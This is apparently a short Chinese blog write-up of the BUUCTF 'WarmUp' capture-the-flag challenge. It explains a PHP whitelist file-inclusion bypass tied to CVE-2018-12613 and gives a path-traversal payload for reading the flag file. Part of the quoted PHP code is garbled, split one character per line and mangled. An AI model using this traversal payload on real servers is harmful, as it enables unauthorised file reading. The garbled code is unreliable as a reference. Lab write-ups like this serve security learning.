今天端午放假想去玩耍
直接进入正题
打开查看源代码有提示
然后就是
然后我就懵了
但经过查阅好像是文件包含,checkFile函数$_page取file参数第一个问号之前的字段检查文件名是否在白名单内
所以就要构造paylaod喽
https://www.jianshu.com/p/0d75017c154f
(phpmyadmin4.8.1远程文件包含漏洞 CVE-2018-12613)
w
h
i
t
e
l
i
s
t
=
[
"
s
o
u
r
c
e
"
=
>
"
s
o
u
r
c
e
.
p
h
p
"
,
"
h
i
n
t
"
=
>
"
h
i
n
t
.
p
h
p
"
]
;
/
/
∗
∗
这
个
是
可
以
被
包
含
文
件
的
文
件
名
所
以
我
们
就
只
有
猜
喽
∗
∗
i
f
(
i
n
a
r
r
a
y
(
whitelist = ["source"=>"source.php","hint"=>"hint.php"];//**这个是可以被包含文件的文件名所以我们就只有猜喽** if (in_array(
whitelist=["source"=>"source.php","hint"=>"hint.php"];//∗∗这个是可以被包含文件的文件名所以我们就只有猜喽∗∗if(inarray(_page, $whitelist)) {
return true;//这个函数连接上一个函数就是以问号为分割取出前面的字符串来判断是否存在包含的文件名中
所以payload就是
file=source.php?../…/…/…/…/ffffllllaaaagggg
BUUCTF WarmUp
最新推荐文章于 2024-08-20 10:53:37 发布